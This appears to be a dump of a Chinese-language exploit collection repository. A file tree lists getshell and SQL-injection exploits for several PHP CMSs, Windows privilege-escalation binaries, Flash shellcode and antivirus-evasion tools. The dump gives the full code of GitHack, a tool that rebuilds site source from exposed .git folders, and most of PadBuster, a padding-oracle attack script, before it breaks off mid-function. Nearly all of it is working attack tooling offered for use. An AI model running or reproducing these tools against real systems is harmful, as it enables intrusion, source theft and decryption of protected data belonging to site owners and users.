├── 32bit-win-8.1 ├── __MACOSX │ └── ._elevator.exe └── elevator.exe ├── 8.1 64 2012 exp └── 8.1 64 2012 exp.exe ├── GitHack-master ├── GitHack.py ├── README.md └── lib │ ├── __init__.py │ ├── __init__.pyc │ ├── parser.py │ └── parser.pyc ├── PadBuster-Padding Oracle Attack ├── README ├── padBuster.pl └── 参考.txt ├── README.md ├── Shopex ├── 4.8.4.htm ├── 4.8.5.htm └── exploit.htm ├── dede ├── Dede v5.7 feedback.php-12-10-31.html ├── buy_action.php ├── dede_5.7.php ├── dede_5.71.php ├── dedecms v55漏洞利用.htm └── dede注入导出.html ├── dz ├── discuz.php ├── discuz4.1.php ├── dz7-2getshell.py ├── faqgetshell.py └── uckeygetshell.php ├── ecshop ├── ECSHOP各版本注入通杀漏洞.htm ├── 全版本注入exp.html └── 要注册账号ECSHOP各版本注入通杀漏洞.html ├── fcgi_exp.zip ├── flash0day ├── calc.htm ├── exp1 │ ├── MyClass.as │ ├── MyClass1.as │ ├── MyClass2.as │ ├── MyUtils.as │ ├── ShellMac64.as │ ├── ShellWin32.as │ ├── ShellWin64.as │ ├── exp1.fla │ └── exp1.swf └── read me.txt ├── fuzzerpwd ├── FuzzerPwd.py ├── README.md ├── password.txt └── pwd.yx ├── jboss_exp ├── jboss_exploit_fat.jar ├── test.war └── 使用说明.txt ├── ms15-051(修改版) ├── ms15-051 │ ├── ms15-051.sln │ ├── ms15-051.suo │ └── ms15-051 │ │ ├── ReadMe.txt │ │ ├── Win32 │ │ └── ms15-051.exe │ │ ├── ms15-051.cpp │ │ ├── ms15-051.vcxproj │ │ ├── ms15-051.vcxproj.filters │ │ ├── ms15-051.vcxproj.user │ │ ├── ntdll.lib │ │ ├── ntdll64.lib │ │ └── x64 │ │ └── ms15-051.exe ├── ms15-051修正版.txt └── pic.png ├── php └── phpdos.py ├── phpcms ├── PHPCMS2008_comment_注入.php ├── PHPCMS_V9 AuthKey泄露导致注入EXP.php ├── PHPCMS_V9 authkey来getshell.php ├── PHPCMS中转脚本.php ├── Phpcms V9 Upfile%20 Exp.php ├── Phpcms V9 uc api SQL Exp.php └── php authkey加密构成.php ├── phpweb └── PHPWEB IIS网站管理系统后台Kedit编辑器漏洞利用代码.html ├── phpwind ├── PHPWIND_exp.php ├── phpwind 5.0.1 Sql注射漏洞利用程序.php └── phpwind5.x passport_client.php UPDATE SQL Injection POC.php ├── php包含和代码执行写一句话.txt ├── shellshock.txt ├── svn └── svn.php ├── urp └── urp_upload.html ├── 二分法查找.py ├── 免杀360cve20144113 ├── Win64.exe.lnk └── win32.exe ├── 延迟注入.py └── 盲注.py /32bit-win-8.1/__MACOSX/._elevator.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/32bit-win-8.1/__MACOSX/._elevator.exe -------------------------------------------------------------------------------- /32bit-win-8.1/elevator.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/32bit-win-8.1/elevator.exe -------------------------------------------------------------------------------- /8.1 64 2012 exp/8.1 64 2012 exp.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/8.1 64 2012 exp/8.1 64 2012 exp.exe -------------------------------------------------------------------------------- /GitHack-master/GitHack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | 4 | import sys 5 | import urllib2 6 | import os 7 | import urlparse 8 | import zlib 9 | import threading 10 | import Queue 11 | import re 12 | import time 13 | from lib.parser import parse 14 | 15 | 16 | if len(sys.argv) == 1: 17 | msg = """ 18 | 19 | A `.git` folder disclosure exploit. By LiJieJie 20 | 21 | Usage: GitHack.py http://www.target.com/.git/ 22 | 23 | bug-report: my[at]lijiejie.com (http://www.lijiejie.com) 24 | """ 25 | print msg 26 | sys.exit(0) 27 | 28 | 29 | class Scanner(object): 30 | def __init__(self): 31 | self.base_url = sys.argv[-1] 32 | self.domain = urlparse.urlparse(sys.argv[-1]).netloc.replace(':', '_') 33 | if not os.path.exists(self.domain): 34 | os.mkdir(self.domain) 35 | print '[+] Download and parse index file ...' 36 | data = self._request_data(sys.argv[-1] + '/index') 37 | with open('index', 'wb') as f: 38 | f.write(data) 39 | self.queue = Queue.Queue() 40 | for entry in parse('index'): 41 | if "sha1" in entry.keys(): 42 | self.queue.put((entry["sha1"].strip(), entry["name"].strip())) 43 | print entry['name'] 44 | self.lock = threading.Lock() 45 | self.thread_count = 20 46 | self.STOP_ME = False 47 | 48 | def _request_data(self, url): 49 | request = urllib2.Request(url, None, {'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)'}) 50 | return urllib2.urlopen(request).read() 51 | 52 | def _print(self, msg): 53 | self.lock.acquire() 54 | print msg 55 | self.lock.release() 56 | 57 | def get_back_file(self): 58 | while not self.STOP_ME: 59 | try: 60 | sha1, file_name = self.queue.get(timeout=0.5) 61 | except: 62 | break 63 | for i in range(3): 64 | try: 65 | folder = '/objects/%s/' % sha1[:2] 66 | data = self._request_data(self.base_url + folder + sha1[2:]) 67 | data = zlib.decompress(data) 68 | data = re.sub('blob \d+\00', '', data) 69 | target_dir = os.path.join(self.domain, os.path.dirname(file_name) ) 70 | if target_dir and not os.path.exists(target_dir): 71 | os.makedirs(target_dir) 72 | with open( os.path.join(self.domain, file_name) , 'wb') as f: 73 | f.write(data) 74 | self._print('[OK] %s' % file_name) 75 | break 76 | except urllib2.HTTPError, e: 77 | if str(e).find('HTTP Error 404') >=0: 78 | self._print('[File not found] %s' % file_name) 79 | break 80 | except Exception, e: 81 | self._print('[Error] %s' % e) 82 | self.exit_thread() 83 | 84 | def exit_thread(self): 85 | self.lock.acquire() 86 | self.thread_count -= 1 87 | self.lock.release() 88 | 89 | def scan(self): 90 | for i in range(self.thread_count): 91 | t = threading.Thread(target=self.get_back_file) 92 | t.start() 93 | 94 | 95 | s = Scanner() 96 | s.scan() 97 | try: 98 | while s.thread_count > 0: 99 | time.sleep(0.1) 100 | except KeyboardInterrupt, e: 101 | s.STOP_ME = True 102 | time.sleep(1.0) 103 | print 'User Aborted.' -------------------------------------------------------------------------------- /GitHack-master/README.md: -------------------------------------------------------------------------------- 1 | GitHack 2 | = 3 | 4 | GitHack is a `.git` folder disclosure exploit. 5 | 6 | It rebuild source code from .git folder while keep directory structure unchanged. 7 | 8 | GitHack是一个.git泄露利用脚本,通过泄露的.git文件夹下的文件,重建还原工程源代码。 9 | 10 | 渗透测试人员、攻击者,可以进一步审计代码,挖掘:文件上传,SQL注射等安全漏洞。 11 | 12 | ## 脚本的工作原理 ## 13 | 14 | * 解析.git/index文件,找到工程中所有的: ( 文件名,文件sha1 ) 15 | * 去.git/objects/ 文件夹下下载对应的文件 16 | * zlib解压文件,按原始的目录结构写入源代码 17 | 18 | ## 它的优点 ## 19 | 20 | * 速度快,默认20个工作线程 21 | * 尽量还原所有的源代码,缺失部分文件不影响脚本工作 22 | * 脚本不需要执行额外的git命令,All you need is python 23 | * 脚本无需浏览目录 24 | 25 | ## 可能的改进## 26 | 27 | * 存在文件被gc打包到git\objects\pack的情况,稍后可测试下看能否直接获取并解压这个文件,还原源代码 28 | 29 | ##用法示例## 30 | GitHack.py http://www.openssl.org/.git/ 31 | 32 | ##反馈## 33 | * my[at]lijiejie.com 34 | * [http://www.lijiejie.com](http://www.lijiejie.com) 35 | 36 | ##Thanks## 37 | Thanks for sbp's great work, I used his .git index parser [gin - a Git index file parser](https://github.com/sbp/gin) 38 | 39 | -------------------------------------------------------------------------------- /GitHack-master/lib/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/GitHack-master/lib/__init__.py -------------------------------------------------------------------------------- /GitHack-master/lib/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/GitHack-master/lib/__init__.pyc -------------------------------------------------------------------------------- /GitHack-master/lib/parser.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # https://github.com/git/git/blob/master/Documentation/technical/index-format.txt 4 | # 5 | 6 | import binascii 7 | import collections 8 | import mmap 9 | import struct 10 | import sys 11 | 12 | 13 | def check(boolean, message): 14 | if not boolean: 15 | import sys 16 | print "error: " + message 17 | sys.exit(1) 18 | 19 | 20 | def parse(filename, pretty=True): 21 | with open(filename, "rb") as o: 22 | f = mmap.mmap(o.fileno(), 0, access=mmap.ACCESS_READ) 23 | 24 | def read(format): 25 | # "All binary numbers are in network byte order." 26 | # Hence "!" = network order, big endian 27 | format = "! " + format 28 | bytes = f.read(struct.calcsize(format)) 29 | return struct.unpack(format, bytes)[0] 30 | 31 | index = collections.OrderedDict() 32 | 33 | # 4-byte signature, b"DIRC" 34 | index["signature"] = f.read(4).decode("ascii") 35 | check(index["signature"] == "DIRC", "Not a Git index file") 36 | 37 | # 4-byte version number 38 | index["version"] = read("I") 39 | check(index["version"] in {2, 3}, 40 | "Unsupported version: %s" % index["version"]) 41 | 42 | # 32-bit number of index entries, i.e. 4-byte 43 | index["entries"] = read("I") 44 | 45 | yield index 46 | 47 | for n in range(index["entries"]): 48 | entry = collections.OrderedDict() 49 | 50 | entry["entry"] = n + 1 51 | 52 | entry["ctime_seconds"] = read("I") 53 | entry["ctime_nanoseconds"] = read("I") 54 | if pretty: 55 | entry["ctime"] = entry["ctime_seconds"] 56 | entry["ctime"] += entry["ctime_nanoseconds"] / 1000000000 57 | del entry["ctime_seconds"] 58 | del entry["ctime_nanoseconds"] 59 | 60 | entry["mtime_seconds"] = read("I") 61 | entry["mtime_nanoseconds"] = read("I") 62 | if pretty: 63 | entry["mtime"] = entry["mtime_seconds"] 64 | entry["mtime"] += entry["mtime_nanoseconds"] / 1000000000 65 | del entry["mtime_seconds"] 66 | del entry["mtime_nanoseconds"] 67 | 68 | entry["dev"] = read("I") 69 | entry["ino"] = read("I") 70 | 71 | # 4-bit object type, 3-bit unused, 9-bit unix permission 72 | entry["mode"] = read("I") 73 | if pretty: 74 | entry["mode"] = "%06o" % entry["mode"] 75 | 76 | entry["uid"] = read("I") 77 | entry["gid"] = read("I") 78 | entry["size"] = read("I") 79 | 80 | entry["sha1"] = binascii.hexlify(f.read(20)).decode("ascii") 81 | entry["flags"] = read("H") 82 | 83 | # 1-bit assume-valid 84 | entry["assume-valid"] = bool(entry["flags"] & (0b10000000 << 8)) 85 | # 1-bit extended, must be 0 in version 2 86 | entry["extended"] = bool(entry["flags"] & (0b01000000 << 8)) 87 | # 2-bit stage (?) 88 | stage_one = bool(entry["flags"] & (0b00100000 << 8)) 89 | stage_two = bool(entry["flags"] & (0b00010000 << 8)) 90 | entry["stage"] = stage_one, stage_two 91 | # 12-bit name length, if the length is less than 0xFFF (else, 0xFFF) 92 | namelen = entry["flags"] & 0xFFF 93 | 94 | # 62 bytes so far 95 | entrylen = 62 96 | 97 | if entry["extended"] and (index["version"] == 3): 98 | entry["extra-flags"] = read("H") 99 | # 1-bit reserved 100 | entry["reserved"] = bool(entry["extra-flags"] & (0b10000000 << 8)) 101 | # 1-bit skip-worktree 102 | entry["skip-worktree"] = bool(entry["extra-flags"] & (0b01000000 << 8)) 103 | # 1-bit intent-to-add 104 | entry["intent-to-add"] = bool(entry["extra-flags"] & (0b00100000 << 8)) 105 | # 13-bits unused 106 | # used = entry["extra-flags"] & (0b11100000 << 8) 107 | # check(not used, "Expected unused bits in extra-flags") 108 | entrylen += 2 109 | 110 | if namelen < 0xFFF: 111 | entry["name"] = f.read(namelen).decode("utf-8", "replace") 112 | entrylen += namelen 113 | else: 114 | # Do it the hard way 115 | name = [] 116 | while True: 117 | byte = f.read(1) 118 | if byte == "\x00": 119 | break 120 | name.append(byte) 121 | entry["name"] = b"".join(name).decode("utf-8", "replace") 122 | entrylen += 1 123 | 124 | padlen = (8 - (entrylen % 8)) or 8 125 | nuls = f.read(padlen) 126 | check(set(nuls) == set(['\x00']), "padding contained non-NUL") 127 | 128 | yield entry 129 | 130 | f.close() 131 | 132 | 133 | 134 | 135 | 136 | -------------------------------------------------------------------------------- /GitHack-master/lib/parser.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/GitHack-master/lib/parser.pyc -------------------------------------------------------------------------------- /PadBuster-Padding Oracle Attack/README: -------------------------------------------------------------------------------- 1 | PadBuster - Automated script for performing Padding Oracle attacks 2 | 3 | Author: Brian Holyfield - Gotham Digital Science (labs@gdssecurity.com) 4 | 5 | Credits to J.Rizzo and T.Duong for providing proof of concept web exploit 6 | techniques and S.Vaudenay for initial discovery of the attack. Credits also 7 | to James M. Martin (research@esptl.com) for sharing proof of concept exploit 8 | code for performing various brute force attack techniques. 9 | 10 | PadBuster is a Perl script for automating Padding Oracle Attacks. PadBuster 11 | provides the capability to decrypt arbitrary ciphertext, encrypt arbitrary plaintext, 12 | and perform automated response analysis to determine whether a request is vulnerable 13 | to padding oracle attacks. 14 | 15 | PadBuster is released under the Reciprocal Public License 1.5 (RPL1.5) 16 | http://www.opensource.org/licenses/rpl1.5 17 | -------------------------------------------------------------------------------- /PadBuster-Padding Oracle Attack/padBuster.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # 3 | # PadBuster v0.3.3 - Automated script for performing Padding Oracle attacks 4 | # Brian Holyfield - Gotham Digital Science (labs@gdssecurity.com) 5 | # 6 | # Credits to J.Rizzo and T.Duong for providing proof of concept web exploit 7 | # techniques and S.Vaudenay for initial discovery of the attack. Credits also 8 | # to James M. Martin (research@esptl.com) for sharing proof of concept exploit 9 | # code for performing various brute force attack techniques, and wireghoul (Eldar 10 | # Marcussen) for making code quality improvements. 11 | # 12 | 13 | use LWP::UserAgent; 14 | use strict; 15 | use warnings; 16 | use Getopt::Std; 17 | use MIME::Base64; 18 | use URI::Escape; 19 | use Getopt::Long; 20 | use Time::HiRes qw( gettimeofday ); 21 | use Compress::Zlib; 22 | use Crypt::SSLeay; 23 | 24 | # Set defaults with $variable = value 25 | my $logFiles; 26 | my $post; 27 | my $encoding = 0; 28 | my $headers; 29 | my $cookie; 30 | my $error; 31 | my $prefix; 32 | my $intermediaryInput; 33 | my $cipherInput; 34 | my $plainTextInput; 35 | my $encodedPlainTextInput; 36 | my $noEncodeOption; 37 | my $superVerbose; 38 | my $proxy; 39 | my $proxyAuth; 40 | my $noIv; 41 | my $auth; 42 | my $resumeBlock; 43 | my $interactive = 0; 44 | my $bruteForce; 45 | my $ignoreContent; 46 | my $useBody; 47 | my $verbose; 48 | 49 | GetOptions( "log" => \$logFiles, 50 | "post=s" => \$post, 51 | "encoding=s" => \$encoding, 52 | "headers=s" => \$headers, 53 | "cookies=s" => \$cookie, 54 | "error=s" => \$error, 55 | "prefix=s" => \$prefix, 56 | "intermediate=s" => \$intermediaryInput, 57 | "ciphertext=s" => \$cipherInput, 58 | "plaintext=s" => \$plainTextInput, 59 | "encodedtext=s" => \$encodedPlainTextInput, 60 | "noencode" => \$noEncodeOption, 61 | "veryverbose" => \$superVerbose, 62 | "proxy=s" => \$proxy, 63 | "proxyauth=s" => \$proxyAuth, 64 | "noiv" => \$noIv, 65 | "auth=s" => \$auth, 66 | "resume=s" => \$resumeBlock, 67 | "interactive" => \$interactive, 68 | "bruteforce" => \$bruteForce, 69 | "ignorecontent" => \$ignoreContent, 70 | "usebody" => \$useBody, 71 | "verbose" => \$verbose); 72 | 73 | print "\n+-------------------------------------------+\n"; 74 | print "| PadBuster - v0.3.3 |\n"; 75 | print "| Brian Holyfield - Gotham Digital Science |\n"; 76 | print "| labs\@gdssecurity.com |\n"; 77 | print "+-------------------------------------------+\n"; 78 | 79 | if ($#ARGV < 2) { 80 | die " 81 | Use: padBuster.pl URL EncryptedSample BlockSize [options] 82 | 83 | Where: URL = The target URL (and query string if applicable) 84 | EncryptedSample = The encrypted value you want to test. Must 85 | also be present in the URL, PostData or a Cookie 86 | BlockSize = The block size being used by the algorithm 87 | 88 | Options: 89 | -auth [username:password]: HTTP Basic Authentication 90 | -bruteforce: Perform brute force against the first block 91 | -ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded) 92 | -cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2) 93 | -encoding [0-4]: Encoding Format of Sample (Default 0) 94 | 0=Base64, 1=Lower HEX, 2=Upper HEX 95 | 3=.NET UrlToken, 4=WebSafe Base64 96 | -encodedtext [Encoded String]: Data to Encrypt (Encoded) 97 | -error [Error String]: Padding Error Message 98 | -headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2) 99 | -interactive: Prompt for confirmation on decrypted bytes 100 | -intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded) 101 | -log: Generate log files (creates folder PadBuster.DDMMYY) 102 | -noencode: Do not URL-encode the payload (encoded by default) 103 | -noiv: Sample does not include IV (decrypt first block) 104 | -plaintext [String]: Plain-Text to Encrypt 105 | -post [Post Data]: HTTP Post Data String 106 | -prefix [Prefix]: Prefix bytes to append to each sample (Encoded) 107 | -proxy [address:port]: Use HTTP/S Proxy 108 | -proxyauth [username:password]: Proxy Authentication 109 | -resume [Block Number]: Resume at this block number 110 | -usebody: Use response body content for response analysis phase 111 | -verbose: Be Verbose 112 | -veryverbose: Be Very Verbose (Debug Only) 113 | 114 | ";} 115 | 116 | # Ok, if we've made it this far we are ready to begin.. 117 | my $url = $ARGV[0]; 118 | my $sample = $ARGV[1]; 119 | my $blockSize = $ARGV[2]; 120 | 121 | if ($url eq "" || $sample eq "" || $blockSize eq "") { 122 | print "\nERROR: The URL, EncryptedSample and BlockSize cannot be null.\n"; 123 | exit(); 124 | } 125 | 126 | # Hard Coded Inputs 127 | #$post = ""; 128 | #$sample = ""; 129 | 130 | my $method = $post ? "POST" : "GET"; 131 | 132 | # These are file related variables 133 | my $dirName = "PadBuster." . &getTime("F"); 134 | my $dirSlash = "/"; 135 | my $dirCmd = "mkdir "; 136 | if (defined($ENV{'OS'})) { 137 | if ($ENV{OS} =~ /Windows/) { 138 | $dirSlash = "\\"; 139 | $dirCmd = "md "; 140 | } 141 | } 142 | my $dirExists = 0; 143 | my $printStats = 0; 144 | my $requestTracker = 0; 145 | my $timeTracker = 0; 146 | 147 | if ($encoding < 0 || $encoding > 4) { 148 | print "\nERROR: Encoding must be a value between 0 and 4\n"; 149 | exit(); 150 | } 151 | my $encodingFormat = $encoding ? $encoding : 0; 152 | 153 | my $encryptedBytes = $sample; 154 | my $totalRequests = 0; 155 | 156 | # See if the sample needs to be URL decoded, otherwise don't (the plus from B64 will be a problem) 157 | if ($sample =~ /\%/) { 158 | $encryptedBytes = &uri_unescape($encryptedBytes) 159 | } 160 | 161 | # Prep the sample for regex use 162 | $sample = quotemeta $sample; 163 | 164 | # Now decode 165 | $encryptedBytes = &myDecode($encryptedBytes, $encodingFormat); 166 | if ( (length($encryptedBytes) % $blockSize) > 0) { 167 | print "\nERROR: Encrypted Bytes must be evenly divisible by Block Size ($blockSize)\n"; 168 | print " Encrypted sample length is ".int(length($encryptedBytes)).". Double check the Encoding and Block Size.\n"; 169 | exit(); 170 | } 171 | 172 | # If no IV, then append nulls as the IV (only if decrypting) 173 | if ($noIv && !$bruteForce && !$plainTextInput) { 174 | $encryptedBytes = "\x00" x $blockSize . $encryptedBytes; 175 | } 176 | 177 | # PlainTextBytes is where the complete decrypted sample will be stored (decrypt only) 178 | my $plainTextBytes; 179 | 180 | # This is a bool to make sure we know where to replace the sample string 181 | my $wasSampleFound = 0; 182 | 183 | # ForgedBytes is where the complete forged sample will be stored (encrypt only) 184 | my $forgedBytes; 185 | 186 | # Isolate the IV into a separate byte array 187 | my $ivBytes = substr($encryptedBytes, 0, $blockSize); 188 | 189 | # Declare some optional elements for storing the results of the first test iteration 190 | # to help the user if they don't know what the padding error looks like 191 | my @oracleCantidates; 192 | my $oracleSignature = ""; 193 | my %oracleGuesses; 194 | my %responseFileBuffer; 195 | 196 | # The block count should be the sample divided by the blocksize 197 | my $blockCount = int(length($encryptedBytes)) / int($blockSize); 198 | 199 | if (!$bruteForce && !$plainTextInput && $blockCount < 2) { 200 | print "\nERROR: There is only one block. Try again using the -noiv option.\n"; 201 | exit(); 202 | } 203 | 204 | # The attack works by sending in a real cipher text block along with a fake block in front of it 205 | # You only ever need to send two blocks at a time (one real one fake) and just work through 206 | # the sample one block at a time 207 | 208 | 209 | # First, re-issue the original request to let the user know if something is potentially broken 210 | my ($status, $content, $location, $contentLength) = &makeRequest($method, $url, $post, $cookie); 211 | 212 | &myPrint("\nINFO: The original request returned the following",0); 213 | &myPrint("[+] Status: $status",0); 214 | &myPrint("[+] Location: $location",0); 215 | &myPrint("[+] Content Length: $contentLength\n",0); 216 | &myPrint("[+] Response: $content\n",1); 217 | 218 | $plainTextInput = &myDecode($encodedPlainTextInput,$encodingFormat) if $encodedPlainTextInput; 219 | 220 | if ($bruteForce) { 221 | &myPrint("INFO: Starting PadBuster Brute Force Mode",0); 222 | my $bfAttempts = 0; 223 | 224 | print "INFO: Resuming previous brute force at attempt $resumeBlock\n" if $resumeBlock; 225 | 226 | # Only loop through the first 3 bytes...this should be enough as it 227 | # requires 16.5M+ requests 228 | 229 | my @bfSamples; 230 | my $sampleString = "\x00" x 2; 231 | for my $c (0 ... 255) { 232 | substr($sampleString, 0, 1, chr($c)); 233 | for my $d (0 ... 255) { 234 | substr($sampleString, 1, 1, chr($d)); 235 | push (@bfSamples, $sampleString); 236 | } 237 | } 238 | 239 | foreach my $testVal (@bfSamples) { 240 | my $complete = 0; 241 | while ($complete == 0) { 242 | my $repeat = 0; 243 | for my $b (0 ... 255) { 244 | $bfAttempts++; 245 | if ( $resumeBlock && ($bfAttempts < ($resumeBlock - ($resumeBlock % 256)+1)) ) { 246 | #SKIP 247 | } else { 248 | my $testBytes = chr($b).$testVal; 249 | $testBytes .= "\x00" x ($blockSize-3); 250 | 251 | my $combinedBf = $testBytes; 252 | $combinedBf .= $encryptedBytes; 253 | $combinedBf = &myEncode($combinedBf, $encoding); 254 | 255 | # Add the Query String to the URL 256 | my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedBf); 257 | 258 | 259 | # Issue the request 260 | my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies); 261 | 262 | my $signatureData = "$status\t$contentLength\t$location"; 263 | $signatureData = "$status\t$contentLength\t$location\t$content" if $useBody; 264 | 265 | if ($oracleSignature eq "") { 266 | &myPrint("[+] Starting response analysis...\n",0) if ($b ==0); 267 | $oracleGuesses{$signatureData}++; 268 | $responseFileBuffer{$signatureData} = "Status: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content"; 269 | if ($b == 255) { 270 | &myPrint("*** Response Analysis Complete ***\n",0); 271 | &determineSignature(); 272 | $printStats = 1; 273 | $timeTracker = 0; 274 | $requestTracker = 0; 275 | $repeat = 1; 276 | $bfAttempts = 0; 277 | } 278 | } 279 | if ($oracleSignature ne "" && $oracleSignature ne $signatureData) { 280 | &myPrint("\nAttempt $bfAttempts - Status: $status - Content Length: $contentLength\n$testUrl\n",0); 281 | &writeFile("Brute_Force_Attempt_".$bfAttempts.".txt", "URL: $testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content"); 282 | } 283 | } 284 | } 285 | ($repeat == 1) ? ($complete = 0) : ($complete = 1); 286 | } 287 | } 288 | } elsif ($plainTextInput) { 289 | # ENCRYPT MODE 290 | &myPrint("INFO: Starting PadBuster Encrypt Mode",0); 291 | 292 | # The block count will be the plaintext divided by blocksize (rounded up) 293 | my $blockCount = int(((length($plainTextInput)+1)/$blockSize)+0.99); 294 | &myPrint("[+] Number of Blocks: ".$blockCount."\n",0); 295 | 296 | my $padCount = ($blockSize * $blockCount) - length($plainTextInput); 297 | $plainTextInput.= chr($padCount) x $padCount; 298 | 299 | # SampleBytes is the encrypted text you want to derive intermediate values for, so 300 | # copy the current ciphertext block into sampleBytes 301 | # Note, nulls are used if not provided and the intermediate values are brute forced 302 | 303 | $forgedBytes = $cipherInput ? &myDecode($cipherInput,1) : "\x00" x $blockSize; 304 | my $sampleBytes = $forgedBytes; 305 | 306 | for (my $blockNum = $blockCount; $blockNum > 0; $blockNum--) { 307 | # IntermediaryBytes is where the intermediate bytes produced by the algorithm are stored 308 | my $intermediaryBytes; 309 | 310 | if ($intermediaryInput && $blockNum == $blockCount) { 311 | $intermediaryBytes = &myDecode($intermediaryInput,2); 312 | } else { 313 | $intermediaryBytes = &processBlock($sampleBytes); 314 | } 315 | 316 | # Now XOR the intermediate bytes with the corresponding bytes from the plain-text block 317 | # This will become the next ciphertext block (or IV if the last one) 318 | $sampleBytes = $intermediaryBytes ^ substr($plainTextInput, (($blockNum-1) * $blockSize), $blockSize); 319 | $forgedBytes = $sampleBytes.$forgedBytes; 320 | 321 | &myPrint("\nBlock ".($blockNum)." Results:",0); 322 | &myPrint("[+] New Cipher Text (HEX): ".&myEncode($sampleBytes,1),0); 323 | &myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1)."\n",0); 324 | 325 | } 326 | $forgedBytes = &myEncode($forgedBytes, $encoding); 327 | chomp($forgedBytes); 328 | } else { 329 | # DECRYPT MODE 330 | &myPrint("INFO: Starting PadBuster Decrypt Mode",0); 331 | 332 | if ($resumeBlock) { 333 | &myPrint("INFO: Resuming previous exploit at Block $resumeBlock\n",0); 334 | } else { 335 | $resumeBlock = 1 336 | } 337 | 338 | # Assume that the IV is included in our sample and that the first block is the IV 339 | for (my $blockNum = ($resumeBlock+1); $blockNum <= $blockCount; $blockNum++) { 340 | # Since the IV is the first block, our block count is artificially inflated by one 341 | &myPrint("*** Starting Block ".($blockNum-1)." of ".($blockCount-1)." ***\n",0); 342 | 343 | # SampleBytes is the encrypted text you want to break, so 344 | # lets copy the current ciphertext block into sampleBytes 345 | my $sampleBytes = substr($encryptedBytes, ($blockNum * $blockSize - $blockSize), $blockSize); 346 | 347 | # IntermediaryBytes is where the the intermediary bytes produced by the algorithm are stored 348 | my $intermediaryBytes = &processBlock($sampleBytes); 349 | 350 | # DecryptedBytes is where the decrypted block is stored 351 | my $decryptedBytes; 352 | 353 | # Now we XOR the decrypted byte with the corresponding byte from the previous block 354 | # (or IV if we are in the first block) to get the actual plain-text 355 | $blockNum == 2 ? $decryptedBytes = $intermediaryBytes ^ $ivBytes : $decryptedBytes = $intermediaryBytes ^ substr($encryptedBytes, (($blockNum - 2) * $blockSize), $blockSize); 356 | 357 | &myPrint("\nBlock ".($blockNum-1)." Results:",0); 358 | &myPrint("[+] Cipher Text (HEX): ".&myEncode($sampleBytes,1),0); 359 | &myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1),0); 360 | &myPrint("[+] Plain Text: $decryptedBytes\n",0); 361 | $plainTextBytes = $plainTextBytes.$decryptedBytes; 362 | } 363 | } 364 | 365 | &myPrint("-------------------------------------------------------",0); 366 | &myPrint("** Finished ***\n", 0); 367 | if ($plainTextInput) { 368 | &myPrint("[+] Encrypted value is: ".&uri_escape($forgedBytes),0); 369 | } else { 370 | &myPrint("[+] Decrypted value (ASCII): $plainTextBytes\n",0); 371 | &myPrint("[+] Decrypted value (HEX): ".&myEncode($plainTextBytes,2)."\n", 0); 372 | &myPrint("[+] Decrypted value (Base64): ".&myEncode($plainTextBytes,0)."\n", 0); 373 | } 374 | &myPrint("-------------------------------------------------------\n",0); 375 | 376 | sub determineSignature { 377 | # Help the user detect the oracle response if an error string was not provided 378 | # This logic will automatically suggest the response pattern that occured most often 379 | # during the test as this is the most likeley one 380 | 381 | my @sortedGuesses = sort {$oracleGuesses{$a} <=> $oracleGuesses{$b}} keys %oracleGuesses; 382 | 383 | &myPrint("The following response signatures were returned:\n",0); 384 | &myPrint("-------------------------------------------------------",0); 385 | if ($useBody) { 386 | &myPrint("ID#\tFreq\tStatus\tLength\tChksum\tLocation",0); 387 | } else { 388 | &myPrint("ID#\tFreq\tStatus\tLength\tLocation",0); 389 | } 390 | &myPrint("-------------------------------------------------------",0); 391 | 392 | my $id = 1; 393 | 394 | foreach (@sortedGuesses) { 395 | my $line = $id; 396 | ($id == $#sortedGuesses+1 && $#sortedGuesses != 0) ? $line.= " **" : $line.=""; 397 | my @sigFields = split("\t", $_); 398 | $line .= "\t$oracleGuesses{$_}\t$sigFields[0]\t$sigFields[1]"; 399 | $useBody ? ( $line .= "\t".unpack( '%32A*', $sigFields[3] ) ) : $line.=""; 400 | $line .= "\t$sigFields[2]"; 401 | &myPrint($line,0); 402 | &writeFile("Response_Analysis_Signature_".$id.".txt", $responseFileBuffer{$_}); 403 | $id++; 404 | } 405 | &myPrint("-------------------------------------------------------",0); 406 | 407 | if ($#sortedGuesses == 0 && !$bruteForce) { 408 | &myPrint("\nERROR: All of the responses were identical.\n",0); 409 | &myPrint("Double check the Block Size and try again.",0); 410 | exit(); 411 | } else { 412 | my $responseNum = &promptUser("\nEnter an ID that matches the error condition\nNOTE: The ID# marked with ** is recommended"); 413 | &myPrint("\nContinuing test with selection $responseNum\n",0); 414 | $oracleSignature = $sortedGuesses[$responseNum-1]; 415 | } 416 | } 417 | 418 | sub prepRequest { 419 | my ($pUrl, $pPost, $pCookie, $pSample, $pTestBytes) = @_; 420 | 421 | # Prepare the request 422 | my $testUrl = $pUrl; 423 | my $wasSampleFound 